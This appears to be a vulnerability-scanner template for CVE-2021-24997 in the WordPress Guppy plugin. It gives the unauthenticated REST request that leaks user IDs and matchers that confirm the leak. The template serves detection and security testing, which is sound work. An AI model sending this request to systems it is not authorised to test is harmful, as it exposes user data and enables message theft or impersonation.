id: CVE-2021-24997

info:
  name: Wordpress Guppy <=1.1 - User ID Disclosure
  author: Evan Rubinstein
  severity: medium
  description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another.
  reference:
    - https://www.exploit-db.com/exploits/50540
    - https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24997
    - https://wpscan.com/vulnerability/747e6c7e-a167-4d82-b6e6-9e8613f0e900
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-24997
    cwe-id: CWE-862
  tags: wordpress,guppy,api,cve2021,cve,wp-plugin

requests:
  - method:
    path:
      - "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"guppyUsers":'
          - '"userId":'
          - '"type":'
        condition: and